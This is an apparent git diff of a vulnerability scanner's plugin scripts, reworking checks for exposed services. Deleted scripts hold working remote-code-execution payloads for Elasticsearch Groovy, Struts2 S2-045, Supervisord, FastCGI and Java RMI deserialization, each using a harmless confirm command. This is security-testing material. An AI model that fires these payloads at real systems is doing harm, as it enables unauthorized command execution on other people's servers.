-/resin-admin/ {status=200} {tag="Resin Admin Login for"} {root_only}
\ No newline at end of file
+/resin-admin/ {status=200} {tag="Resin Admin Login for"} {root_only}
diff --git a/scripts/disabled/kong_admin_rest_api.py b/scripts/disabled/kong_admin_rest_api.py
new file mode 100644
index 0000000..4569185
--- /dev/null
+++ b/scripts/disabled/kong_admin_rest_api.py
@@ -0,0 +1,29 @@
+# -*- encoding: utf-8 -*-
+
+from lib.common import save_script_result
+import requests
+
+
+ports_to_check = 8001  # default service port
+
+
+def do_check(self, url):
+ if url != '/':
+ return
+
+ if self.conn_pool and self.index_headers.get('Server', '').startswith('kong/'):
+ save_script_result(self, '200', self.base_url, 'Kong Admin Rest API')
+
+    if self.port == 8001:  # if a connection pool for port 8001 is already maintained, the logic above has covered the scan
+ return
+
+    if 8001 not in self.ports_open:  # port 8001 is not open
+ return
+
+    # if the input target is an HTTP service on a non-standard port,
+    # port 8001 still needs to be checked separately
+
+    resp = requests.get('http://%s:8001/' % self.host, timeout=10)
+ headers = resp.headers
+ if headers.get('Server', '').startswith('kong/'):
+ save_script_result(self, resp.status_code, 'http://%s:8001' % self.host, 'Kong Admin Rest API')
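
Scripts under scripts/ and scripts/disabled/ share the plugin convention shown here: an optional module-level ports_to_check, plus a do_check(self, url) hook that receives the Scanner instance (self.host, self.ports_open, self.base_url, self.index_headers, ...). A minimal sketch of a new script under that convention; 'ExampleService' and port 8080 are hypothetical:

    # -*- encoding: utf-8 -*-
    import requests
    from lib.common import save_script_result

    ports_to_check = 8080  # hypothetical default service port


    def do_check(self, url):
        if url != '/':                   # run once per target, on the root URL only
            return
        if 8080 not in self.ports_open:  # skip hosts where the port is closed
            return
        try:
            resp = requests.get('http://%s:8080/' % self.host, timeout=10)
            if resp.headers.get('Server', '').startswith('ExampleService/'):
                save_script_result(self, resp.status_code,
                                   'http://%s:8080' % self.host, '', 'Example Service Found')
        except Exception:
            pass
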
diff --git a/scripts/smb_ms17010.py b/scripts/disabled/smb_ms17010.py
similarity index 94%
rename from scripts/smb_ms17010.py
rename to scripts/disabled/smb_ms17010.py
index ef5b162..e6adfea 100644
--- a/scripts/smb_ms17010.py
+++ b/scripts/disabled/smb_ms17010.py
@@ -2,7 +2,9 @@
import socket
import binascii
-from lib.common import save_user_script_result
+from lib.common import save_script_result
+
+ports_to_check = 445
def get_tree_connect_request(ip, tree_id):
@@ -16,8 +18,9 @@ def get_tree_connect_request(ip, tree_id):
def do_check(self, url):
- if url != '/':
+ if url != '/' or 445 not in self.ports_open:
return
+
ip = self.host.split(':')[0]
port = 445
@@ -66,6 +69,6 @@ def do_check(self, url):
data = s.recv(1024)
s.close()
if "\x05\x02\x00\xc0" in data:
- save_user_script_result(self, '', ip + ':445', '', 'MS17010 SMB Remote Code Execution')
+ save_script_result(self, '', ip + ':445', '', 'MS17010 SMB Remote Code Execution')
except Exception as e:
return False
diff --git a/scripts/disabled/zookeeper_unauth.py b/scripts/disabled/zookeeper_unauth.py
new file mode 100644
index 0000000..b438585
--- /dev/null
+++ b/scripts/disabled/zookeeper_unauth.py
@@ -0,0 +1,29 @@
+# coding=utf-8
+
+import socket
+from lib.common import save_script_result
+
+ports_to_check = 2181  # default service port
+
+
+def do_check(self, url):
+ if url != '/':
+ return
+ port = 2181
+    if self.scheme == 'zookeeper' and self.port != 2181:  # non-standard port
+ port = self.port
+ elif 2181 not in self.ports_open:
+ return
+
+    socket.setdefaulttimeout(5)
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # created before try so s is defined in finally
+    try:
+ s.connect((self.host, port))
+ s.send('envi')
+ data = s.recv(1024)
+ if 'Environment' in data:
+ save_script_result(self, '', 'zookeeper://%s:%s' % (self.host, port), '', 'Zookeeper Unauthorized Access')
+ except Exception as e:
+ pass
+ finally:
+ s.close()
diff --git a/scripts/discuz_backup_file.py b/scripts/discuz_backup_file.py
index 52597c2..40492fa 100644
--- a/scripts/discuz_backup_file.py
+++ b/scripts/discuz_backup_file.py
@@ -1,19 +1,10 @@
-# Discuz
-# /config/config_ucenter.php.bak {status=200} {tag="<?php"}
     if str(self.index_headers).find('discuz_') >= 0 or \
- str(self.index_headers).find('_saltkey=') > 0:
+ str(self.index_headers).find('_saltkey=') > 0:
url_lst = ['/config/config_ucenter.php.bak',
'/config/.config_ucenter.php.swp',
@@ -27,10 +18,10 @@ def do_check(self, url):
status, headers, html_doc = self.http_request(_url)
if status == 200 or status == 206:
                 if html_doc.find('<?php') >= 0:
- save_user_script_result(self, status, self.base_url + _url, 'Discuz Backup File Found')
+ save_script_result(self, status, self.base_url + _url, 'Discuz Backup File Found')
# getcolor DOM XSS
status, headers, html_doc = self.http_request('/static/image/admincp/getcolor.htm')
if html_doc.find("if(fun) eval('parent.'+fun+'") > 0:
- save_user_script_result(self, status, self.base_url + '/static/image/admincp/getcolor.htm',
- '', 'Discuz getcolor DOM XSS')
+ save_script_result(self, status, self.base_url + '/static/image/admincp/getcolor.htm',
+ '', 'Discuz getcolor DOM XSS')
diff --git a/scripts/elastic_search_groovy.py b/scripts/elastic_search_groovy.py
deleted file mode 100644
index a3486a9..0000000
--- a/scripts/elastic_search_groovy.py
+++ /dev/null
@@ -1,53 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8 -*-
-# __author__ = '1c3z'
-# __author__ = 'xfkxfk'
-
-import json
-import httplib
-from lib.common import save_user_script_result
-
-
-def execute(ip, command):
- parameters = {
- "size": 1,
- "script_fields":
- {
- "iswin":
- {
- "script": '''java.lang.Math.class.forName("java.io.BufferedReader").getConstructor(java.io.
- Reader.class).newInstance(java.lang.Math.class.forName("java.io.InputStreamReader").
- getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName("java.
- lang.Runtime").getRuntime().exec("%s").getInputStream())).readLines()''' % command,
- "lang": "groovy"
- }
- }
- }
- data = json.dumps(parameters)
- try:
- agent = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'
- url = "http://%s:9200/_search?pretty" % ip
- conn = httplib.HTTPConnection(ip, port=9200, timeout=10)
- headers = {"Content-Type": "application/x-www-form-urlencoded", "User-Agent": agent}
- conn.request(method='POST', url=url, body=data, headers=headers)
- resp = conn.getresponse()
- code = resp.status
- body = resp.read()
- if code != 200:
- return
- if body:
- body = json.loads(body)
- result = body["hits"]["hits"][0]["fields"]["iswin"][0]
- if result.find('inet addr') >= 0:
- return True
- except Exception as e:
- pass
-
-
-def do_check(self, url):
- if url != '/':
- return
- ip = self.host.split(':')[0]
- if execute(ip, 'ifconfig'):
- save_user_script_result(self, '', 'http://%s:9200/_search?pretty' % ip,
- '', 'ElasticSearch Groovy remote code exec CVE-2015-1427')
diff --git a/scripts/fastcgi_remote_code_execution.py b/scripts/fastcgi_remote_code_execution.py
deleted file mode 100644
index 6588846..0000000
--- a/scripts/fastcgi_remote_code_execution.py
+++ /dev/null
@@ -1,45 +0,0 @@
-#
-import socket
-from lib.common import save_user_script_result
-
-
-def test_fastcgi(ip):
- data = """
- 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
- 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
- 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
- 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
- 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
- 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
- 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
- 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
- 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
- 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
- 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
- """
- data_s = ''
- for _ in data.split():
- data_s += chr(int(_, 16))
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(5.0)
- sock.connect((ip, 9000))
- sock.send(data_s)
- ret = sock.recv(1024)
- if ret.find(':root:') > 0:
- return True, ret
- else:
- return False, None
- except Exception as e:
- return False, None
- finally:
- sock.close()
-
-
-def do_check(self, url):
- if url != '/':
- return
- host = self.host.split(':')[0]
- ret, txt = test_fastcgi(host)
- if ret:
- save_user_script_result(self, '', host + ':9000', '', 'Fastcgi Remote Code Execution Vulnerability')
diff --git a/scripts/http_proxy.py b/scripts/http_proxy.py
deleted file mode 100644
index 41b282e..0000000
--- a/scripts/http_proxy.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#!/usr/bin/env python
-# coding=utf-8
-
-import socket
-import requests
-requests.packages.urllib3.disable_warnings()
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- ip = self.host.split(':')[0]
- ports_open = is_port_open(ip)
- headers = {
- "User-Agent": "http_proxy v0.1",
- "Connection": "close"
- }
-
- for port in ports_open:
- proxy_url = "http://{}:{}".format(ip, port)
- proxy = {"http": proxy_url, "https": proxy_url}
- try:
- _ = requests.get('http://weibo.com/robots.txt', headers=headers, proxies=proxy, timeout=10.0)
- code = _.status_code
- html = _.text
- if code == 200 and html.find("http://weibo.com/sitemap.xml") >= 0:
- save_user_script_result(self, '', '%s:%s' % (ip, port), 'HTTP Proxy')
-
- except Exception as e:
- pass
-
-
-def is_port_open(arg):
- ports_open = []
- for port in [80, 8080, 8088, 8888]:
- try:
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(3.0)
- if s.connect_ex((arg, port)) == 0:
- ports_open.append(port)
- except Exception as e:
- pass
- finally:
- s.close()
- return ports_open
diff --git a/scripts/is_admin.py b/scripts/is_admin_site.py
similarity index 58%
rename from scripts/is_admin.py
rename to scripts/is_admin_site.py
index 89eeee9..03dfadd 100644
--- a/scripts/is_admin.py
+++ b/scripts/is_admin_site.py
@@ -1,5 +1,4 @@
-
-from lib.common import save_user_script_result
+from lib.common import save_script_result
def do_check(self, url):
@@ -7,6 +6,5 @@ def do_check(self, url):
if self.conn_pool and self.index_status in (301, 302):
for keyword in ['admin', 'login', 'manage', 'backend']:
if self.index_headers.get('location', '').find(keyword) >= 0:
- save_user_script_result(self, self.index_status, self.base_url + '/',
- 'Admin Site')
+ save_script_result(self, self.index_status, self.base_url + '/', 'Admin Site')
break
diff --git a/scripts/log_files.py b/scripts/log_files.py
index 07dbf1b..56de8e8 100644
--- a/scripts/log_files.py
+++ b/scripts/log_files.py
@@ -18,7 +18,7 @@
# /log.tar.bz2 {status=206} {type="application/octet-stream"} {root_only}
# /log.7z {status=206} {type="application/octet-stream"} {root_only}
-from lib.common import save_user_script_result
+from lib.common import save_script_result
def do_check(self, url):
@@ -36,8 +36,8 @@ def do_check(self, url):
self.crawl('/' + log_folder + '/')
if status == 206 and self._404_status != 206:
- save_user_script_result(self, status, self.base_url + '/' + log_folder, '',
- 'Log File Found')
+ save_script_result(self, status, self.base_url + '/' + log_folder, '',
+ 'Log File Found')
url_lst = ['access.log', 'www.log', 'error.log', 'log.log', 'sql.log',
'errors.log', 'debug.log', 'db.log', 'install.log',
@@ -51,9 +51,9 @@ def do_check(self, url):
status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
# print '/' + log_folder + '/' + _url
if status == 206 and \
- (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0):
- save_user_script_result(self, status, self.base_url + url_prefix + '/' + _url,
- '', 'Log File')
+ (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0):
+ save_script_result(self, status, self.base_url + url_prefix + '/' + _url,
+ '', 'Log File')
for log_folder in folders:
for _url in ['log.txt', 'logs.txt']:
@@ -61,5 +61,5 @@ def do_check(self, url):
status, headers, html_doc = self.http_request(url_prefix + '/' + _url)
# print '/' + log_folder + '/' + _url
if status == 206 and headers.get('content-type', '').find('text/plain') >= 0:
- save_user_script_result(self, status, self.base_url + url_prefix + '/' + _url,
- '', 'Log File')
+ save_script_result(self, status, self.base_url + url_prefix + '/' + _url,
+ '', 'Log File')
diff --git a/scripts/mongodb_unauth.py b/scripts/mongodb_unauth.py
deleted file mode 100644
index f1ddd41..0000000
--- a/scripts/mongodb_unauth.py
+++ /dev/null
@@ -1,21 +0,0 @@
-#!/usr/bin/python
-
-import pymongo
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- try:
- ip = self.host.split(':')[0]
- conn = pymongo.MongoClient(host=ip, port=27017, connectTimeoutMS=5000, socketTimeoutMS=5000)
- database_list = conn.database_names()
- if not database_list:
- conn.close()
- return
- detail = "%s MongoDB Unauthorized Access : %s" % (ip, ",".join(database_list))
- conn.close()
- save_user_script_result(self, '', 'mongodb://%s:27017' % ip, detail)
- except Exception as e:
- pass
diff --git a/scripts/mongodb_unauthorized_access.py b/scripts/mongodb_unauthorized_access.py
new file mode 100644
index 0000000..a5aab96
--- /dev/null
+++ b/scripts/mongodb_unauthorized_access.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python
+# -*- encoding: utf-8 -*-
+
+import pymongo
+from lib.common import save_script_result
+
+
+ports_to_check = 27017  # default port to scan
+
+
+def do_check(self, url):
+ if url != '/':
+ return
+ port = 27017
+    if self.scheme == 'mongodb' and self.port != 27017:  # non-standard port
+ port = self.port
+ elif 27017 not in self.ports_open:
+ return
+ try:
+ conn = pymongo.MongoClient(host=self.host, port=port, connectTimeoutMS=5000, socketTimeoutMS=5000)
+ database_list = conn.database_names()
+ if not database_list:
+ conn.close()
+ return
+ detail = "%s MongoDB Unauthorized Access : %s" % (self.host, ",".join(database_list))
+ conn.close()
+ save_script_result(self, '', 'mongodb://%s:%s' % (self.host, port), detail)
+ except Exception as e:
+ pass
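
Because do_check consults self.scheme, a MongoDB instance on a non-standard port can be targeted directly with a scheme-prefixed host, analogous to the redis:// form noted below. A hypothetical invocation (host and port are placeholders):

    python BBScan.py --scripts-only --script mongodb_unauthorized_access --host mongodb://test.ip:27018
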
diff --git a/scripts/opennms-1099-rmi-deserialized.py b/scripts/opennms-1099-rmi-deserialized.py
deleted file mode 100644
index c5443ad..0000000
--- a/scripts/opennms-1099-rmi-deserialized.py
+++ /dev/null
@@ -1,82 +0,0 @@
-# coding=utf-8
-
-import socket
-import binascii
-import time
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- ip = self.host.split(':')[0]
- aim = RmiScan(ip)
- if aim:
- save_user_script_result(self, '', ip + ':1099', 'OPENNMS RMI DeSerializable')
-
-
-def RmiScan(ip, port=1099, timeout=10):
- first_send = "4a524d4900024b"
- second_send = "000c31302e3131302e32382e313300000000"
- third_send ="50aced00057722000000000000000000000000000000000000000000000000000044154dc9d4e63bdf74000570776e656473" \
- "7d00000001000f6a6176612e726d692e52656d6f746570787200176a6176612e6c616e672e7265666c6563742e50726f7879" \
- "e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e" \
- "646c65723b7078707372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f63" \
- "6174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469" \
- "6c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b707870737200316f72672e617061636865" \
- "2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5472616e73666f726d65644d617061773fe05df15a70030002" \
- "4c000e6b65795472616e73666f726d657274002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6" \
- "e732f5472616e73666f726d65723b4c001076616c75655472616e73666f726d657271007e000a707870707372003a6f72672" \
- "e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666" \
- "f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6" \
- "d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b7078707572002d5b4c6f72672e6170616368652e6" \
- "36f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8341899020000707870000000067" \
- "372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616" \
- "e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4" \
- "f626a6563743b707870767200176a6176612e6e65742e55524c436c6173734c6f61646572000000000000000000000070787" \
- "07372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b6" \
- "5725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6" \
- "563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797" \
- "065737400125b4c6a6176612f6c616e672f436c6173733b707870757200135b4c6a6176612e6c616e672e4f626a6563743b9" \
- "0ce589f1073296c02000070787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000" \
- "0707870000000017672000f5b4c6a6176612e6e65742e55524c3b5251fd24c51b68cd02000070787074000e676574436f6e7" \
- "374727563746f727571007e001d000000017671007e001d7371007e00167571007e001b000000017571007e001b000000017" \
- "571007e001f000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f646549000" \
- "4706f72744c0009617574686f7269747971007e00184c000466696c6571007e00184c0004686f737471007e00184c0008707" \
- "26f746f636f6c71007e00184c000372656671007e0018707870ffffffffffffffff707400052f746d702f740000740004666" \
- "96c65707874000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e00167571007e001b00000001" \
- "74000d4572726f7242617365457865637400096c6f6164436c6173737571007e001d00000001767200106a6176612e6c616e6" \
- "72e537472696e67a0f0a4387a3bb3420200007078707371007e00167571007e001b00000002740007646f5f6578656375710" \
- "07e001d000000017100"
-
- forth_send = "7e00367400096765744d6574686f647571007e001d0000000271007e003671007e00237371007e00167571007e001b00000" \
- "00270757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007078700000000174000677686f" \
- "616d69740006696e766f6b657571007e001d00000002767200106a6176612e6c616e672e4f626a656374000000000000000" \
- "000000070787071007e002f737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f61" \
- "64466163746f724900097468726573686f6c647078703f4000000000000c7708000000100000000174000576616c7565710" \
- "07e004878787672001b6a6176612e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870"
- first_send = binascii.a2b_hex(first_send)
- second_send = binascii.a2b_hex(second_send)
- third_send = binascii.a2b_hex(third_send)
- forth_send = binascii.a2b_hex(forth_send)
-
- socket.setdefaulttimeout(timeout)
- AIM = False
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((ip, port))
- sock.send(first_send)
- sock.recv(1024)
- time.sleep(0.5)
- sock.send(second_send)
- sock.send(third_send)
- sock.send(forth_send)
- data = sock.recv(20480)
- time.sleep(1)
- if "8888" in data:
- AIM = True
- except Exception as e:
- pass
- finally:
- sock.close()
- return AIM
diff --git a/scripts/outlook_web_app.py b/scripts/outlook_web_app.py
index 12e41a4..e7989f1 100644
--- a/scripts/outlook_web_app.py
+++ b/scripts/outlook_web_app.py
@@ -1,13 +1,13 @@
-# Exchange Outlook Web APP
+# Outlook Web APP
import httplib
-from lib.common import save_user_script_result
+from lib.common import save_script_result
def do_check(self, url):
if url == '/' and self.conn_pool:
if self.index_status == 302 and self.index_headers.get('location', '').lower() == 'https://%s/owa' % self.host:
- save_user_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
+ save_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
return
status, headers, html_doc = self.http_request('/ews/')
@@ -15,14 +15,14 @@ def do_check(self, url):
if status == 302:
redirect_url = headers.get('location', '')
if redirect_url == 'https://%shttp://%s/ews/' % (self.host, self.host):
- save_user_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
+ save_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found')
return
if redirect_url == 'https://%s/ews/' % self.host:
try:
conn = httplib.HTTPSConnection(self.host)
conn.request('HEAD', '/ews')
if conn.getresponse().status == 401:
- save_user_script_result(self, 401, redirect_url, 'OutLook Web APP Found')
+ save_script_result(self, 401, redirect_url, 'OutLook Web APP Found')
conn.close()
except Exception as e:
pass
@@ -30,5 +30,5 @@ def do_check(self, url):
elif status == 401:
if headers.get('Server', '').find('Microsoft-IIS') >= 0:
- save_user_script_result(self, 401, self.base_url + '/ews/', 'OutLook Web APP Found')
+ save_script_result(self, 401, self.base_url + '/ews/', 'OutLook Web APP Found')
return
diff --git a/scripts/readme.txt b/scripts/readme.txt
new file mode 100644
index 0000000..afa02d9
--- /dev/null
+++ b/scripts/readme.txt
@@ -0,0 +1,5 @@
+
+Place your scripts in this folder
+
diff --git a/scripts/redis_unauthorized_access.py b/scripts/redis_unauthorized_access.py
index 47796ef..935c7a6 100644
--- a/scripts/redis_unauthorized_access.py
+++ b/scripts/redis_unauthorized_access.py
@@ -1,22 +1,33 @@
-#!/usr/bin/python
+#!/usr/bin/env python
+# -*- encoding: utf-8 -*-
import socket
-from lib.common import save_user_script_result
+from lib.common import save_script_result
+
+
+ports_to_check = 6379  # default port to scan
def do_check(self, url):
if url != '/':
return
+ port = 6379
+    # a non-standard port: no need to check whether 6379 is open
+    # targets like redis://test.ip:16379 are supported, so Redis on non-standard ports can be scanned
+ if self.scheme == 'redis' and self.port != 6379:
+ port = self.port
+ elif 6379 not in self.ports_open:
+ return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
try:
host = self.host.split(':')[0]
- s.connect((host, 6379))
+ s.connect((host, port))
payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
s.send(payload)
data = s.recv(1024)
s.close()
if "redis_version" in data:
- save_user_script_result(self, '', 'redis://' + host + ':6379', 'Redis Unauthorized Access')
+ save_script_result(self, '', 'redis://%s:%s' % (host, port), 'Redis Unauthorized Access')
except Exception as e:
s.close()
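
The hex payload above is just the Redis serialization protocol (RESP) framing of the INFO command; decoded byte for byte it reads:

    payload = '*1\r\n$4\r\ninfo\r\n'   # a one-element array holding the 4-byte bulk string "info"
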
diff --git a/scripts/scan_by_hostname_or_folder.py b/scripts/scan_by_hostname_or_folder.py
index fbe11ee..44e9851 100644
--- a/scripts/scan_by_hostname_or_folder.py
+++ b/scripts/scan_by_hostname_or_folder.py
@@ -22,7 +22,7 @@
# /../{hostname_or_folder}.log {status=206} {type="application/"}
-from lib.common import save_user_script_result
+from lib.common import save_script_result
def do_check(self, url):
@@ -36,18 +36,18 @@ def do_check(self, url):
for ext in extensions:
status, headers, html_doc = self.http_request('/' + name + ext)
if status == 206 and \
- (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0) or \
+ (self._404_status == 404 or headers.get('content-type', '').find('application/') >= 0) or \
(ext == '.sql' and html_doc.find("CREATE TABLE") >= 0):
- save_user_script_result(self, status, self.base_url + '/' + name + ext,
- '', 'Compressed File')
+ save_script_result(self, status, self.base_url + '/' + name + ext,
+ '', 'Compressed File')
elif url != '/':
# sub folders like /aaa/bbb/
folder_name = url.split('/')[-2]
if len(folder_name) >= 4:
- url_prefix = url[: -len(folder_name)-1]
+ url_prefix = url[: -len(folder_name) - 1]
for ext in extensions:
status, headers, html_doc = self.http_request(url_prefix + folder_name + ext)
if status == 206 and headers.get('content-type', '').find('application/') >= 0:
- save_user_script_result(self, status, self.base_url + url_prefix + folder_name + ext,
- '', 'Compressed File')
+ save_script_result(self, status, self.base_url + url_prefix + folder_name + ext,
+ '', 'Compressed File')
diff --git a/scripts/sensitive_folders.py b/scripts/sensitive_folders.py
index 2f3ed2d..89281e5 100644
--- a/scripts/sensitive_folders.py
+++ b/scripts/sensitive_folders.py
@@ -1,26 +1,4 @@
-
-from lib.common import save_user_script_result
-
-'''
-Temporary disabled item:
-
-/WEB-INF/classes
-/jPlayer
-/jwplayer
-/extjs
-/swfupload
-/boss
-/editor
-/ckeditor
-/htmedit
-/htmleditor
-/ueditor
-/tomcat
-/output
-/fck
-/cgi-bin
-'''
-
+from lib.common import save_script_result
folders = """
/admin
@@ -64,5 +42,5 @@ def do_check(self, url):
self.crawl(_url + '/')
if status == 206 and self._404_status != 206:
- save_user_script_result(self, status, self.base_url + _url,
- '', 'Possible Sensitive File Found')
+ save_script_result(self, status, self.base_url + _url,
+ '', 'Possible Sensitive File Found')
diff --git a/scripts/struts_s0245_rce.py b/scripts/struts_s0245_rce.py
deleted file mode 100644
index fb0b298..0000000
--- a/scripts/struts_s0245_rce.py
+++ /dev/null
@@ -1,44 +0,0 @@
-#!/usr/bin/env python
-# coding=utf-8
-
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/' and not url.endswith('.action') and not url.endswith('.do'):
- return
- if not self.conn_pool:
- return
- cmd = 'env'
- headers = {}
- headers['User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) " \
- "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
- headers['Content-Type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
- "(#_memberAccess?(#_memberAccess=#dm):" \
- "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
- "(#ognlUtil=#container.getInstance" \
- "(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
- "(#ognlUtil.getExcludedPackageNames().clear())." \
- "(#ognlUtil.getExcludedClasses().clear())." \
- "(#context.setMemberAccess(#dm))))." \
- "(#cmd='" + \
- cmd + \
- "')." \
- "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase()." \
- "contains('win')))." \
- "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
- "(#p=new java.lang.ProcessBuilder(#cmds))." \
- "(#p.redirectErrorStream(true)).(#process=#p.start())." \
- "(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." \
- "getOutputStream()))." \
- "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
- "(#ros.flush())}"
- data = '--40a1f31a0ec74efaa46d53e9f4311353\r\n' \
- 'Content-Disposition: form-data; name="image1"\r\n' \
- 'Content-Type: text/plain; charset=utf-8\r\n\r\ntest\r\n--40a1f31a0ec74efaa46d53e9f4311353--\r\n'
- try:
- html = self.conn_pool.urlopen(method='POST', url=self.base_url + '/' + url, body=data, headers=headers, retries=1).data
- if html.find('LOGNAME=') >= 0:
- save_user_script_result(self, '', self.base_url + '/' + url, '', 'Struts2 s02-45 Remote Code Execution')
- except Exception as e:
- pass
diff --git a/scripts/supervisord_rce.py b/scripts/supervisord_rce.py
deleted file mode 100644
index 2c0aa9f..0000000
--- a/scripts/supervisord_rce.py
+++ /dev/null
@@ -1,31 +0,0 @@
-# -*- coding: utf-8 -*-
-# @Author : helit
-# Ref: https://github.com/phith0n/vulhub/blob/master/supervisor/CVE-2017-11610/poc.py
-
-import xmlrpclib
-import random
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- arg = self.host
- if ':9001' not in arg:
- domain = arg + ':9001'
- else:
- domain = arg
- target = 'http://' + domain + '/RPC2'
- try:
- proxy = xmlrpclib.ServerProxy(target)
- old = getattr(proxy, 'supervisor.readLog')(0,0)
- a = random.randint(10000000, 20000000)
- b = random.randint(10000000, 20000000)
- command = 'expr ' + str(a) + ' + ' + str(b)
- logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
- getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
- result = getattr(proxy, 'supervisor.readLog')(0,0)
- if result[len(old):].strip() == str(a+b):
- save_user_script_result(self, '', arg, '', 'CVE-2017-11610 Supervisor Remote Command Execution')
- except Exception as e:
- pass
diff --git a/scripts/tools/__init__.py b/scripts/tools/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/scripts/tools/port_scan.py b/scripts/tools/port_scan.py
new file mode 100644
index 0000000..0a47647
--- /dev/null
+++ b/scripts/tools/port_scan.py
@@ -0,0 +1,10 @@
+#!/usr/bin/env python
+# -*- encoding: utf-8 -*-
+# set ports_to_check to the port(s) you want to scan
+# python BBScan.py --scripts-only --script port_scan --host www.baidu.com --network 16 --save-ports ports_80.txt
+
+ports_to_check = [80]
+
+
+def do_check(self, url):
+ pass
\ No newline at end of file
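
ports_to_check is written both as a single integer (the Kong, ZooKeeper, MongoDB and Redis scripts above) and as a list, as here; both forms appear in this patch and drive the same port pre-scan. A hypothetical variant collecting hosts with either of two ports open:

    ports_to_check = [80, 8080]
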
diff --git a/scripts/wordpress_backup_file.py b/scripts/wordpress_backup_file.py
index b341173..98d8df7 100644
--- a/scripts/wordpress_backup_file.py
+++ b/scripts/wordpress_backup_file.py
@@ -1,13 +1,6 @@
# Wordpress
-# /wp-config.php.inc {status=200} {tag="<?php"}
         if html_doc.find('<?php') >= 0:
- save_user_script_result(self, status, self.base_url + _url, '', 'WordPress Backup File Found')
+ save_script_result(self, status, self.base_url + _url, '', 'WordPress Backup File Found')
diff --git a/scripts/zookeeper_unauth.py b/scripts/zookeeper_unauth.py
deleted file mode 100644
index aac2852..0000000
--- a/scripts/zookeeper_unauth.py
+++ /dev/null
@@ -1,22 +0,0 @@
-# coding=utf-8
-
-import socket
-from lib.common import save_user_script_result
-
-
-def do_check(self, url):
- if url != '/':
- return
- ip = self.host.split(':')[0]
- try:
- socket.setdefaulttimeout(5)
